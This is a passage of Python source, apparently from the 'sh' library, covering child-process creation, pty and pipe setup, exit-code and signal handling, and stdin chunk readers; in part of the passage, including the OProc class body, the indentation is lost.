        # prevent cyclic references (the process holds a streamreader, which
        # holds this handler closure)
        handler_args = (process.stdin, weakref.ref(process))
    else:
        # just the chunk
        handler_args = ()

    def wrapped(chunk):
        # the process is held as a weakref, so dereference it at call time
        extra = handler_args
        if len(extra) == 2:
            extra = (handler_args[0], handler_args[1]())
        return handler(chunk, *extra)

    return wrapped
def get_exc_exit_code_would_raise(exit_code, ok_codes, sigpipe_ok):
    """Return the exception class this exit code warrants, or None if the
    process terminated acceptably."""
    success = exit_code in ok_codes
    bad_sig = -exit_code in SIGNALS_THAT_SHOULD_THROW_EXCEPTION

    # for a piped command, SIGPIPE is perfectly normal -- the consumer of the
    # process's pipe is allowed to terminate early -- so treat it as success
    if sigpipe_ok and -exit_code == signal.SIGPIPE:
        bad_sig = False
        success = True

    if success and not bad_sig:
        return None
    return get_rc_exc(exit_code)
def handle_process_exit_code(exit_code):
    """ this should only ever be called once for each child process """
    # a signal death is reported as a negative exit code
    if os.WIFSIGNALED(exit_code):
        return -os.WTERMSIG(exit_code)
    # a normal exit just yields the process's own status
    if os.WIFEXITED(exit_code):
        return os.WEXITSTATUS(exit_code)
    raise RuntimeError("Unknown child exit status!")
def no_interrupt(syscall, *args, **kwargs):
    """ a helper for making system calls immune to EINTR """
    while True:
        try:
            return syscall(*args, **kwargs)
        except OSError as e:
            # retry only calls interrupted by a signal; anything else is a
            # real error and must propagate
            if e.errno != errno.EINTR:
                raise
class OProc(object):
""" this class is instantiated by RunningCommand for a command to be exec'd.
it handles all the nasty business involved with correctly setting up the
input/output to the child process. it gets its name for subprocess.Popen
(process open) but we're calling ours OProc (open process) """
_default_window_size = (24, 80)
# used in redirecting
STDOUT = -1
STDERR = -2
def __init__(self, command, parent_log, cmd, stdin, stdout, stderr, call_args, pipe, process_assign_lock):
"""
cmd is the full list of arguments that will be exec'd. it includes the program name and all its arguments.
stdin, stdout, stderr are what the child will use for standard input/output/err.
call_args is a mapping of all the special keyword arguments to apply to the child process.
"""
self.command = command
self.call_args = call_args
# convenience
ca = self.call_args
if ca["uid"] is not None:
if os.getuid() != 0:
raise RuntimeError("UID setting requires root privileges")
target_uid = ca["uid"]
pwrec = pwd.getpwuid(ca["uid"])
target_gid = pwrec.pw_gid
else:
target_uid, target_gid = None, None
# I had issues with getting 'Input/Output error reading stdin' from dd,
# until I set _tty_out=False
if ca["piped"]:
ca["tty_out"] = False
self._stdin_process = None
# if the objects that we are passing to the OProc happen to be a
# file-like object that is a tty, for example `sys.stdin`, then, later
# on in this constructor, we're going to skip out on setting up pipes
# and pseudoterminals for those endpoints
stdin_is_fd_based = ob_is_fd_based(stdin)
stdout_is_fd_based = ob_is_fd_based(stdout)
stderr_is_fd_based = ob_is_fd_based(stderr)
tee_out = ca["tee"] in (True, "out")
tee_err = ca["tee"] == "err"
single_tty = ca["tty_in"] and ca["tty_out"] and ca["unify_ttys"]
# this logic is a little convoluted, but basically this top-level
# if/else is for consolidating input and output TTYs into a single
# TTY. this is the only way some secure programs like ssh will
# output correctly (is if stdout and stdin are both the same TTY)
if single_tty:
# master_fd, slave_fd = pty.openpty()
#
# Anything that is written on the master end is provided to the process on the slave end as though it was
# input typed on a terminal. -"man 7 pty"
#
# later, in the child process, we're going to do this, so keep it in mind:
#
# os.dup2(self._stdin_child_fd, 0)
# os.dup2(self._stdout_child_fd, 1)
# os.dup2(self._stderr_child_fd, 2)
self._stdin_parent_fd, self._stdin_child_fd = pty.openpty()
# this makes our parent fds behave like a terminal. it says that the very same fd that we "type" to (for
# stdin) is the same one that we see output printed to (for stdout)
self._stdout_parent_fd = os.dup(self._stdin_parent_fd)
# this line is what makes stdout and stdin attached to the same pty. in other words the process will write
# to the same underlying fd as stdout as it uses to read from for stdin. this makes programs like ssh happy
self._stdout_child_fd = os.dup(self._stdin_child_fd)
self._stderr_parent_fd = os.dup(self._stdin_parent_fd)
self._stderr_child_fd = os.dup(self._stdin_child_fd)
# do not consolidate stdin and stdout. this is the most common use-
# case
else:
# this check here is because we may be doing piping and so our stdin
# might be an instance of OProc
if isinstance(stdin, OProc) and stdin.call_args["piped"]:
self._stdin_child_fd = stdin._pipe_fd
self._stdin_parent_fd = None
self._stdin_process = stdin
elif stdin_is_fd_based:
self._stdin_child_fd = os.dup(get_fileno(stdin))
self._stdin_parent_fd = None
elif ca["tty_in"]:
self._stdin_parent_fd, self._stdin_child_fd = pty.openpty()
# tty_in=False is the default
else:
self._stdin_child_fd, self._stdin_parent_fd = os.pipe()
if stdout_is_fd_based and not tee_out:
self._stdout_child_fd = os.dup(get_fileno(stdout))
self._stdout_parent_fd = None
# tty_out=True is the default
elif ca["tty_out"]:
self._stdout_parent_fd, self._stdout_child_fd = pty.openpty()
else:
self._stdout_parent_fd, self._stdout_child_fd = os.pipe()
# unless STDERR is going to STDOUT, it ALWAYS needs to be a pipe,
# and never a PTY. the reason for this is not totally clear to me,
# but it has to do with the fact that if STDERR isn't set as the
# CTTY (because STDOUT is), the STDERR buffer won't always flush
# by the time the process exits, and the data will be lost.
# i've only seen this on OSX.
if stderr is OProc.STDOUT:
# if stderr is going to stdout, but stdout is a tty or a pipe,
# we should not specify a read_fd, because stdout is os.dup'ed
# directly to the stdout fd (no pipe), and so stderr won't have
# a slave end of a pipe either to dup
if stdout_is_fd_based and not tee_out:
self._stderr_parent_fd = None
else:
self._stderr_parent_fd = os.dup(self._stdout_parent_fd)
self._stderr_child_fd = os.dup(self._stdout_child_fd)
elif stderr_is_fd_based and not tee_err:
self._stderr_child_fd = os.dup(get_fileno(stderr))
self._stderr_parent_fd = None
else:
self._stderr_parent_fd, self._stderr_child_fd = os.pipe()
piped = ca["piped"]
self._pipe_fd = None
if piped:
fd_to_use = self._stdout_parent_fd
if piped == "err":
fd_to_use = self._stderr_parent_fd
self._pipe_fd = os.dup(fd_to_use)
new_session = ca["new_session"]
needs_ctty = ca["tty_in"] and new_session
self.ctty = None
if needs_ctty:
self.ctty = os.ttyname(self._stdin_child_fd)
gc_enabled = gc.isenabled()
if gc_enabled:
gc.disable()
# for synchronizing
session_pipe_read, session_pipe_write = os.pipe()
exc_pipe_read, exc_pipe_write = os.pipe()
# this pipe is for synchronizing with the child that the parent has
# closed its in/out/err fds. this is a bug on OSX (but not linux),
# where we can lose output sometimes, due to a race, if we do
# os.close(self._stdout_child_fd) in the parent after the child starts
# writing.
if IS_MACOS:
close_pipe_read, close_pipe_write = os.pipe()
else:
close_pipe_read, close_pipe_write = None, None
# session id, group id, process id
self.sid = None
self.pgid = None
self.pid = os.fork()
# child
if self.pid == 0: # pragma: no cover
if IS_MACOS:
os.read(close_pipe_read, 1)
os.close(close_pipe_read)
os.close(close_pipe_write)
# this is critical
# our exc_pipe_write must have CLOEXEC enabled. the reason for this is tricky:
# if our child (the block we're in now), has an exception, we need to be able to write to exc_pipe_write, so
# that when the parent does os.read(exc_pipe_read), it gets our traceback. however, os.read(exc_pipe_read)
# in the parent blocks, so if our child *doesn't* have an exception, and doesn't close the writing end, it
# hangs forever. not good! but obviously the child can't close the writing end until it knows it's not
# going to have an exception, which is impossible to know because but what if os.execv has an exception? so
# the answer is CLOEXEC, so that the writing end of the pipe gets closed upon successful exec, and the
# parent reading the read end won't block (close breaks the block).
flags = fcntl.fcntl(exc_pipe_write, fcntl.F_GETFD)
flags |= fcntl.FD_CLOEXEC
fcntl.fcntl(exc_pipe_write, fcntl.F_SETFD, flags)
try:
# ignoring SIGHUP lets us persist even after the parent process
# exits. only ignore if we're backgrounded
if ca["bg"] is True:
signal.signal(signal.SIGHUP, signal.SIG_IGN)
# python ignores SIGPIPE by default. we must make sure to put
# this behavior back to the default for spawned processes,
# otherwise SIGPIPE won't kill piped processes, which is what we
# need, so that we can check the error code of the killed
# process to see that SIGPIPE killed it
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
# put our forked process in a new session? this will relinquish
# any control of our inherited CTTY and also make our parent
# process init
if new_session:
os.setsid()
# if we're not going in a new session, we should go in a new
# process group. this way, our process, and any children it
# spawns, are alone, contained entirely in one group. if we
# didn't do this, and didn't use a new session, then our exec'd
# process *could* exist in the same group as our python process,
# depending on how we launch the process (from a shell, or some
# other way)
else:
os.setpgrp()
sid = os.getsid(0)
pgid = os.getpgid(0)
payload = ("%d,%d" % (sid, pgid)).encode(DEFAULT_ENCODING)
os.write(session_pipe_write, payload)
if ca["tty_out"] and not stdout_is_fd_based and not single_tty:
# set raw mode, so there isn't any weird translation of
# newlines to \r\n and other oddities. we're not outputting
# to a terminal anyways
#
# we HAVE to do this here, and not in the parent process,
# because we have to guarantee that this is set before the
# child process is run, and we can't do it twice.
tty.setraw(self._stdout_child_fd)
# if the parent-side fd for stdin exists, close it. the case
# where it may not exist is if we're using piping
if self._stdin_parent_fd:
os.close(self._stdin_parent_fd)
if self._stdout_parent_fd:
os.close(self._stdout_parent_fd)
if self._stderr_parent_fd:
os.close(self._stderr_parent_fd)
os.close(session_pipe_read)
os.close(exc_pipe_read)
cwd = ca["cwd"]
if cwd:
os.chdir(cwd)
os.dup2(self._stdin_child_fd, 0)
os.dup2(self._stdout_child_fd, 1)
os.dup2(self._stderr_child_fd, 2)
# set our controlling terminal, but only if we're using a tty
# for stdin. it doesn't make sense to have a ctty otherwise
if needs_ctty:
tmp_fd = os.open(os.ttyname(0), os.O_RDWR)
os.close(tmp_fd)
if ca["tty_out"] and not stdout_is_fd_based:
setwinsize(1, ca["tty_size"])
if ca["uid"] is not None:
os.setgid(target_gid)
os.setuid(target_uid)
preexec_fn = ca["preexec_fn"]
if callable(preexec_fn):
preexec_fn()
close_fds = ca["close_fds"]
if ca["pass_fds"]:
close_fds = True
if close_fds:
pass_fds = set((0, 1, 2, exc_pipe_write))
pass_fds.update(ca["pass_fds"])
# don't inherit file descriptors
inherited_fds = os.listdir("/dev/fd")
inherited_fds = set(int(fd) for fd in inherited_fds) - pass_fds
for fd in inherited_fds:
try:
os.close(fd)
except OSError:
pass
# actually execute the process
if ca["env"] is None:
os.execv(cmd[0], cmd)
else:
os.execve(cmd[0], cmd, ca["env"])
# we must ensure that we carefully exit the child process on
# exception, otherwise the parent process code will be executed
# twice on exception https://github.com/amoffat/sh/issues/202
#
# if your parent process experiences an exit code 255, it is most
# likely that an exception occurred between the fork of the child
# and the exec. this should be reported.
except: # noqa: E722
# some helpful debugging
tb = traceback.format_exc().encode("utf8", "ignore")
try:
os.write(exc_pipe_write, tb)
except Exception as e:
# dump to stderr if we cannot save it to exc_pipe_write
sys.stderr.write("\nFATAL SH ERROR: %s\n" % e)
finally:
os._exit(255)
# parent
else:
if gc_enabled:
gc.enable()
os.close(self._stdin_child_fd)
os.close(self._stdout_child_fd)
os.close(self._stderr_child_fd)
# tell our child process that we've closed our write_fds, so it is
# ok to proceed towards exec. see the comment where this pipe is
# opened, for why this is necessary
if IS_MACOS:
os.close(close_pipe_read)
os.write(close_pipe_write, str(1).encode(DEFAULT_ENCODING))
os.close(close_pipe_write)
os.close(exc_pipe_write)
fork_exc = os.read(exc_pipe_read, 1024 ** 2)
os.close(exc_pipe_read)
if fork_exc:
fork_exc = fork_exc.decode(DEFAULT_ENCODING)
raise ForkException(fork_exc)
os.close(session_pipe_write)
sid, pgid = os.read(session_pipe_read, 1024).decode(DEFAULT_ENCODING).split(",")
os.close(session_pipe_read)
self.sid = int(sid)
self.pgid = int(pgid)
# used to determine what exception to raise. if our process was
# killed via a timeout counter, we'll raise something different than
# a SIGKILL exception
self.timed_out = False
self.started = time.time()
self.cmd = cmd
# exit code should only be manipulated from within self._wait_lock
# to prevent race conditions
self.exit_code = None
self.stdin = stdin
# this accounts for when _out is a callable that is passed stdin. in that case, if stdin is unspecified, we
# must set it to a queue, so callbacks can put things on it
if callable(ca["out"]) and self.stdin is None:
self.stdin = Queue()
# _pipe_queue is used internally to hand off stdout from one process
# to another. by default, all stdout from a process gets dumped
# into this pipe queue, to be consumed in real time (hence the
# thread-safe Queue), or at a potentially later time
self._pipe_queue = Queue()
# this is used to prevent a race condition when we're waiting for
# a process to end, and the OProc's internal threads are also checking
# for the processes's end
self._wait_lock = threading.Lock()
# these are for aggregating the stdout and stderr. we use a deque
# because we don't want to overflow
self._stdout = deque(maxlen=ca["internal_bufsize"])
self._stderr = deque(maxlen=ca["internal_bufsize"])
if ca["tty_in"] and not stdin_is_fd_based:
setwinsize(self._stdin_parent_fd, ca["tty_size"])
self.log = parent_log.get_child("process", repr(self))
self.log.debug("started process")
# disable echoing, but only if it's a tty that we created ourselves
if ca["tty_in"] and not stdin_is_fd_based:
attr = termios.tcgetattr(self._stdin_parent_fd)
attr[3] &= ~termios.ECHO
termios.tcsetattr(self._stdin_parent_fd, termios.TCSANOW, attr)
# this represents the connection from a Queue object (or whatever
# we're using to feed STDIN) to the process's STDIN fd
self._stdin_stream = None
if self._stdin_parent_fd:
log = self.log.get_child("streamwriter", "stdin")
self._stdin_stream = StreamWriter(log, self._stdin_parent_fd, self.stdin,
ca["in_bufsize"], ca["encoding"], ca["tty_in"])
stdout_pipe = None
if pipe is OProc.STDOUT and not ca["no_pipe"]:
stdout_pipe = self._pipe_queue
# this represents the connection from a process's STDOUT fd to
# wherever it has to go, sometimes a pipe Queue (that we will use
# to pipe data to other processes), and also an internal deque
# that we use to aggregate all the output
save_stdout = not ca["no_out"] and (tee_out or stdout is None)
pipe_out = ca["piped"] in ("out", True)
pipe_err = ca["piped"] in ("err",)
# if we're piping directly into another process's file descriptor, we
# bypass reading from the stdout stream altogether, because we've
# already hooked up this processes's stdout fd to the other
# processes's stdin fd
self._stdout_stream = None
if not pipe_out and self._stdout_parent_fd:
if callable(stdout):
stdout = construct_streamreader_callback(self, stdout)
self._stdout_stream = StreamReader(
self.log.get_child("streamreader", "stdout"),
self._stdout_parent_fd, stdout, self._stdout,
ca["out_bufsize"], ca["encoding"],
ca["decode_errors"], stdout_pipe,
save_data=save_stdout
)
elif self._stdout_parent_fd:
os.close(self._stdout_parent_fd)
# if stderr is going to one place (because it's grouped with stdout,
# or we're dealing with a single tty), then we don't actually need a
# stream reader for stderr, because we've already set one up for
# stdout above
self._stderr_stream = None
if stderr is not OProc.STDOUT and not single_tty and not pipe_err and self._stderr_parent_fd:
stderr_pipe = None
if pipe is OProc.STDERR and not ca["no_pipe"]:
stderr_pipe = self._pipe_queue
save_stderr = not ca["no_err"] and (ca["tee"] in ("err",) or stderr is None)
if callable(stderr):
stderr = construct_streamreader_callback(self, stderr)
self._stderr_stream = StreamReader(
Logger("streamreader"),
self._stderr_parent_fd, stderr, self._stderr,
ca["err_bufsize"], ca["encoding"], ca["decode_errors"],
stderr_pipe, save_data=save_stderr
)
elif self._stderr_parent_fd:
os.close(self._stderr_parent_fd)
def timeout_fn():
self.timed_out = True
self.signal(ca["timeout_signal"])
self._timeout_event = None
self._timeout_timer = None
if ca["timeout"]:
self._timeout_event = threading.Event()
self._timeout_timer = threading.Timer(ca["timeout"], self._timeout_event.set)
self._timeout_timer.start()
# this is for cases where we know that the RunningCommand that was
# launched was not .wait()ed on to complete. in those unique cases,
# we allow the thread that processes output to report exceptions in
# that thread. it's important that we only allow reporting of the
# exception, and nothing else (like the additional stuff that
# RunningCommand.wait() does), because we want the exception to be
# re-raised in the future, if we DO call .wait()
handle_exit_code = None
if not self.command._spawned_and_waited and ca["bg_exc"]:
def fn(exit_code):
with process_assign_lock:
return self.command.handle_command_exit_code(exit_code)
handle_exit_code = fn
self._quit_threads = threading.Event()
thread_name = "background thread for pid %d" % self.pid
self._bg_thread_exc_queue = Queue(1)
self._background_thread = _start_daemon_thread(
background_thread,
thread_name, self._bg_thread_exc_queue, timeout_fn,
self._timeout_event, handle_exit_code, self.is_alive,
self._quit_threads
)
# start the main io threads. stdin thread is not needed if we are
# connecting from another process's stdout pipe
self._input_thread = None
self._input_thread_exc_queue = Queue(1)
if self._stdin_stream:
close_before_term = not needs_ctty
thread_name = "STDIN thread for pid %d" % self.pid
self._input_thread = _start_daemon_thread(
input_thread,
thread_name, self._input_thread_exc_queue, self.log,
self._stdin_stream, self.is_alive, self._quit_threads,
close_before_term
)
# this event is for cases where the subprocess that we launch
# launches its OWN subprocess and os.dup's the stdout/stderr fds to that
# new subprocess. in that case, stdout and stderr will never EOF,
# so our output_thread will never finish and will hang. this event
# prevents that hanging
self._stop_output_event = threading.Event()
self._output_thread_exc_queue = Queue(1)
thread_name = "STDOUT/ERR thread for pid %d" % self.pid
self._output_thread = _start_daemon_thread(
output_thread,
thread_name, self._output_thread_exc_queue, self.log,
self._stdout_stream, self._stderr_stream,
self._timeout_event, self.is_alive, self._quit_threads,
self._stop_output_event
)
def __repr__(self):
    """Short debug representation: the child's pid plus a truncated command."""
    truncated_cmd = self.cmd[:500]
    return "<Process %d %r>" % (self.pid, truncated_cmd)
# these next 3 properties are primary for tests
@property
def output_thread_exc(self):
    """Exception captured by the STDOUT/ERR pump thread, or None."""
    try:
        return self._output_thread_exc_queue.get(False)
    except Empty:
        return None
@property
def input_thread_exc(self):
    """Exception captured by the STDIN pump thread, or None."""
    try:
        return self._input_thread_exc_queue.get(False)
    except Empty:
        return None
@property
def bg_thread_exc(self):
    """Exception captured by the background (timeout) thread, or None."""
    try:
        return self._bg_thread_exc_queue.get(False)
    except Empty:
        return None
def change_in_bufsize(self, buf):
    """Switch the stdin stream's buffering type to *buf* at runtime."""
    bufferer = self._stdin_stream.stream_bufferer
    bufferer.change_buffering(buf)
def change_out_bufsize(self, buf):
    """Switch the stdout stream's buffering type to *buf* at runtime."""
    bufferer = self._stdout_stream.stream_bufferer
    bufferer.change_buffering(buf)
def change_err_bufsize(self, buf):
    """Switch the stderr stream's buffering type to *buf* at runtime."""
    bufferer = self._stderr_stream.stream_bufferer
    bufferer.change_buffering(buf)
@property
def stdout(self):
    """All aggregated stdout output, joined into a single bytes object.

    The empty separator is encoded with the configured encoding rather
    than hard-coded as b"" (some encodings do not encode "" to b"").
    """
    joiner = "".encode(self.call_args["encoding"])
    return joiner.join(self._stdout)
@property
def stderr(self):
    """All aggregated stderr output, joined into a single bytes object."""
    joiner = "".encode(self.call_args["encoding"])
    return joiner.join(self._stderr)
def get_pgid(self):
    """Return the process group id the child belongs to right now.

    Unlike self.pgid (recorded at launch), this queries the OS for the
    current value.
    """
    current_pgid = os.getpgid(self.pid)
    return current_pgid
def get_sid(self):
    """Return the session id the child belongs to right now.

    Unlike self.sid (recorded at launch), this queries the OS for the
    current value.
    """
    current_sid = os.getsid(self.pid)
    return current_sid
def signal_group(self, sig):
    """Send signal *sig* to the child's current process group."""
    self.log.debug("sending signal %d to group", sig)
    pgid = self.get_pgid()
    os.killpg(pgid, sig)
def signal(self, sig):
    """Send signal *sig* to the child process itself."""
    self.log.debug("sending signal %d", sig)
    target_pid = self.pid
    os.kill(target_pid, sig)
def kill_group(self):
    """Forcibly kill (SIGKILL) the child's whole process group."""
    self.log.debug("killing group")
    self.signal_group(signal.SIGKILL)
def kill(self):
    """Forcibly kill (SIGKILL) the child process."""
    self.log.debug("killing")
    self.signal(signal.SIGKILL)
def terminate(self):
    """Politely terminate (SIGTERM) the child process."""
    self.log.debug("terminating")
    self.signal(signal.SIGTERM)
def is_alive(self):
    """ polls if our child process has completed, without blocking. this
    method has side-effects, such as setting our exit_code, if we happen to
    see our child exit while this is running

    returns an (alive, exit_code) tuple; exit_code is None until the
    child's exit has been witnessed (here or in .wait()) """
    if self.exit_code is not None:
        return False, self.exit_code
    # what we're doing here essentially is making sure that the main thread
    # (or another thread), isn't calling .wait() on the process. because
    # .wait() calls os.waitpid(self.pid, 0), we can't do an os.waitpid
    # here...because if we did, and the process exited while in this
    # thread, the main thread's os.waitpid(self.pid, 0) would raise OSError
    # (because the process ended in another thread).
    #
    # so essentially what we're doing is, using this lock, checking if
    # we're calling .wait(), and if we are, let .wait() get the exit code
    # and handle the status, otherwise let us do it.
    acquired = self._wait_lock.acquire(False)
    if not acquired:
        # .wait() (or another caller) holds the lock and will reap the
        # child; just report what we currently know
        if self.exit_code is not None:
            return False, self.exit_code
        return True, self.exit_code
    try:
        # WNOHANG is just that...we're calling waitpid without hanging...
        # essentially polling the process. the return result is (0, 0) if
        # there's no process status, so we check that pid == self.pid below
        # in order to determine how to proceed
        pid, exit_code = no_interrupt(os.waitpid, self.pid, os.WNOHANG)
        if pid == self.pid:
            self.exit_code = handle_process_exit_code(exit_code)
            self._process_just_ended()
            return False, self.exit_code
    # no child process
    except OSError:
        return False, self.exit_code
    else:
        return True, self.exit_code
    finally:
        self._wait_lock.release()
def _process_just_ended(self):
    """ cleanup that runs once the child's exit has been witnessed: cancel
    any pending timeout timer, fire the user's "done" callback, and close
    the stdin fd when nothing else is responsible for it """
    if self._timeout_timer:
        self._timeout_timer.cancel()
    done_callback = self.call_args["done"]
    if done_callback:
        # "success" means the exit code is one the caller declared ok
        success = self.exit_code in self.call_args["ok_code"]
        done_callback(success, self.exit_code)
    # this can only be closed at the end of the process, because it might be
    # the CTTY, and closing it prematurely will send a SIGHUP. we also
    # don't want to close it if there's a self._stdin_stream, because that
    # is in charge of closing it also
    if self._stdin_parent_fd and not self._stdin_stream:
        os.close(self._stdin_parent_fd)
def wait(self):
    """ waits for the process to complete, handles the exit code. also
    joins the stdin/output/background helper threads, so that all output
    has been aggregated by the time this returns """
    self.log.debug("acquiring wait lock to wait for completion")
    # using the lock in a with-context blocks, which is what we want if
    # we're running wait()
    with self._wait_lock:
        self.log.debug("got wait lock")
        witnessed_end = False
        if self.exit_code is None:
            self.log.debug("exit code not set, waiting on pid")
            pid, exit_code = no_interrupt(os.waitpid, self.pid, 0)  # blocks
            self.exit_code = handle_process_exit_code(exit_code)
            witnessed_end = True
        else:
            self.log.debug("exit code already set (%d), no need to wait", self.exit_code)
        # tell the helper threads to wind down
        self._quit_threads.set()
        # we may not have a thread for stdin, if the pipe has been connected
        # via _piped="direct"
        if self._input_thread:
            self._input_thread.join()
        # wait, then signal to our output thread that the child process is
        # done, and we should have finished reading all the stdout/stderr
        # data that we can by now
        timer = threading.Timer(2.0, self._stop_output_event.set)
        timer.start()
        # wait for our stdout and stderr streamreaders to finish reading and
        # aggregating the process output
        self._output_thread.join()
        timer.cancel()
        self._background_thread.join()
        # only run the end-of-process cleanup once, by whoever saw the exit
        if witnessed_end:
            self._process_just_ended()
        return self.exit_code
def input_thread(log, stdin, is_alive, quit_thread, close_before_term):
    """ this is run in a separate thread. it writes into our process's
    stdin (a streamwriter) and waits the process to end AND everything that
    can be written to be written.

    close_before_term controls whether the writer is closed as soon as all
    input is written, or deferred until the child has exited (see the
    needs_ctty logic at the call site) """
    closed = False
    alive = True
    poller = Poller()
    poller.register_write(stdin)
    while poller and alive:
        changed = poller.poll(1)
        for fd, events in changed:
            if events & (POLLER_EVENT_WRITE | POLLER_EVENT_HUP):
                log.debug("%r ready for more input", stdin)
                done = stdin.write()
                if done:
                    poller.unregister(stdin)
                    if close_before_term:
                        stdin.close()
                        closed = True
        alive, _ = is_alive()
    # all input has been written; linger until the child exits
    while alive:
        quit_thread.wait(1)
        alive, _ = is_alive()
    # if we deferred closing above, do it now that the child is gone
    if not closed:
        stdin.close()
def event_wait(ev, timeout=None):
    """Wait on the Event *ev* and return whether it is set.

    Wraps Event.wait() because python 2.6's version returns None instead
    of the flag state.
    """
    result = ev.wait(timeout)
    if IS_PY26:
        # 2.6's Event.wait() gives no return value; query the flag directly
        result = ev.is_set()
    return result
def background_thread(timeout_fn, timeout_event, handle_exit_code, is_alive, quit_thread):
    """ handles the timeout logic, and reports exit-code exceptions for
    commands that were launched without being .wait()ed on """
    # if there's a timeout event, loop
    if timeout_event:
        while not quit_thread.is_set():
            timed_out = event_wait(timeout_event, 0.1)
            if timed_out:
                timeout_fn()
                break
    # handle_exit_code will be a function ONLY if our command was NOT waited on
    # as part of its spawning. in other words, it's probably a background
    # command
    #
    # this reports the exit code exception in our thread. it's purely for the
    # user's awareness, and cannot be caught or used in any way, so it's ok to
    # suppress this during the tests
    if handle_exit_code and not RUNNING_TESTS:  # pragma: no cover
        alive = True
        exit_code = None
        while alive:
            quit_thread.wait(1)
            alive, exit_code = is_alive()
        handle_exit_code(exit_code)
def output_thread(log, stdout, stderr, timeout_event, is_alive, quit_thread, stop_output_event):
    """ this function is run in a separate thread. it reads from the
    process's stdout stream (a streamreader), and waits for it to claim that
    its done. stderr gets the same treatment when it has its own
    streamreader. both readers are closed once the child is known dead """
    poller = Poller()
    if stdout is not None:
        poller.register_read(stdout)
    if stderr is not None:
        poller.register_read(stderr)
    # this is our poll loop for polling stdout or stderr that is ready to
    # be read and processed. if one of those streamreaders indicate that it
    # is done altogether being read from, we remove it from our list of
    # things to poll. when no more things are left to poll, we leave this
    # loop and clean up
    while poller:
        changed = no_interrupt(poller.poll, 0.1)
        for f, events in changed:
            if events & (POLLER_EVENT_READ | POLLER_EVENT_HUP):
                log.debug("%r ready to be read from", f)
                done = f.read()
                if done:
                    poller.unregister(f)
            elif events & POLLER_EVENT_ERROR:
                # for some reason, we have to just ignore streams that have had an
                # error. i'm not exactly sure why, but don't remove this until we
                # figure that out, and create a test for it
                pass
        # bail out early on a timeout, or when the parent has decided the
        # child's fds will never EOF (see _stop_output_event at the call site)
        if timeout_event and timeout_event.is_set():
            break
        if stop_output_event.is_set():
            break
    # we need to wait until the process is guaranteed dead before closing our
    # outputs, otherwise SIGPIPE
    alive, _ = is_alive()
    while alive:
        quit_thread.wait(1)
        alive, _ = is_alive()
    if stdout:
        stdout.close()
    if stderr:
        stderr.close()
class DoneReadingForever(Exception):
    """Raised by stdin chunk readers when input is permanently exhausted."""
class NotYetReadyToRead(Exception):
    """Raised by chunk readers when no data is available yet; caller retries."""
def determine_how_to_read_input(input_obj):
    """ given some kind of input object, return a function that knows how to
    read chunks of that input object, along with a short description of the
    detected input type (used for logging).
    each reader function should return a chunk and raise a DoneReadingForever
    exception, or return None, when there's no more data to read
    NOTE: the function returned does not need to care much about the requested
    buffering type (eg, unbuffered vs newline-buffered). the StreamBufferer
    will take care of that. these functions just need to return a
    reasonably-sized chunk of data. """
    if isinstance(input_obj, Queue):
        log_msg = "queue"
        get_chunk = get_queue_chunk_reader(input_obj)
    elif callable(input_obj):
        log_msg = "callable"
        get_chunk = get_callable_chunk_reader(input_obj)
    # also handles stringio
    elif hasattr(input_obj, "read"):
        log_msg = "file descriptor"
        get_chunk = get_file_chunk_reader(input_obj)
    elif isinstance(input_obj, basestring):
        log_msg = "string"
        get_chunk = get_iter_string_reader(input_obj)
    elif isinstance(input_obj, bytes):
        log_msg = "bytes"
        get_chunk = get_iter_string_reader(input_obj)
    elif isinstance(input_obj, GeneratorType):
        log_msg = "generator"
        get_chunk = get_iter_chunk_reader(iter(input_obj))
    elif input_obj is None:
        # no stdin at all: the reader signals EOF immediately
        log_msg = "None"

        def raise_():
            raise DoneReadingForever
        get_chunk = raise_
    else:
        # last resort: anything iterable gets read item by item
        try:
            it = iter(input_obj)
        except TypeError:
            raise Exception("unknown input object")
        else:
            log_msg = "general iterable"
            get_chunk = get_iter_chunk_reader(it)
    return get_chunk, log_msg
def get_queue_chunk_reader(stdin):
    """Return a reader over the Queue *stdin*.

    A None item signals permanent EOF (DoneReadingForever); an empty poll
    raises NotYetReadyToRead so the caller can retry later.
    """
    def read_chunk():
        try:
            item = stdin.get(True, 0.1)
        except Empty:
            raise NotYetReadyToRead
        if item is None:
            raise DoneReadingForever
        return item
    return read_chunk
def get_callable_chunk_reader(stdin):
    """Return a reader that obtains each chunk by calling *stdin*.

    A falsy result (or DoneReadingForever raised by the callable itself)
    ends input permanently.
    """
    def read_chunk():
        try:
            chunk = stdin()
        except DoneReadingForever:
            # the callable opted out explicitly; propagate as-is
            raise
        if not chunk:
            raise DoneReadingForever
        return chunk
    return read_chunk
def get_iter_string_reader(stdin):
    """Return a reader over the string/bytes *stdin*, one fixed-size piece
    per call.

    Even under line buffering we only need reasonable chunk sizes here —
    the StreamBufferer downstream handles all actual buffering.
    """
    bufsize = 1024
    offsets = range(0, len(stdin), bufsize)
    pieces = (stdin[offset:offset + bufsize] for offset in offsets)
    return get_iter_chunk_reader(pieces)
def get_iter_chunk_reader(stdin):
    """Return a reader that yields successive items of the iterator *stdin*,
    raising DoneReadingForever once it is exhausted."""
    def read_chunk():
        try:
            # the next() builtin dispatches to __next__ on py3 and to
            # .next() on py2, covering both interpreter branches
            return next(stdin)
        except StopIteration:
            raise DoneReadingForever
    return read_chunk
def get_file_chunk_reader(stdin):
    """ return a reader that pulls up to 1024 bytes at a time from the
    file-like object *stdin*, first polling for readiness when it is a
    real file (StringIO/BytesIO are read directly) """
    bufsize = 1024

    def fn():
        # python 3.* includes a fileno on stringios, but accessing it throws an
        # exception. that exception is how we'll know we can't do a poll on
        # stdin
        is_real_file = True
        if IS_PY3:
            try:
                stdin.fileno()
            except UnsupportedOperation:
                is_real_file = False
        # this poll is for files that may not yet be ready to read. we test
        # for fileno because StringIO/BytesIO cannot be used in a poll
        if is_real_file and hasattr(stdin, "fileno"):
            poller = Poller()
            poller.register_read(stdin)
            changed = poller.poll(0.1)
            ready = False
            for fd, events in changed:
                if events & (POLLER_EVENT_READ | POLLER_EVENT_HUP):
                    ready = True
            if not ready:
                raise NotYetReadyToRead
        chunk = stdin.read(bufsize)
        if not chunk:
            raise DoneReadingForever
        else:
            return chunk

    return fn
def bufsize_type_to_bufsize(bf_type):
    """Map a buffering type to the number of bytes read per chunk.

    1 means newline-buffered, but we still read 1024-byte chunks and let a
    StreamBufferer split them on newlines; 0 means unbuffered (one byte at
    a time); any other value is taken as an explicit chunk size.
    """
    special_sizes = {1: 1024, 0: 1}
    return special_sizes.get(bf_type, bf_type)
class StreamWriter(object):
    """ StreamWriter reads from some input (the stdin param) and writes to a fd
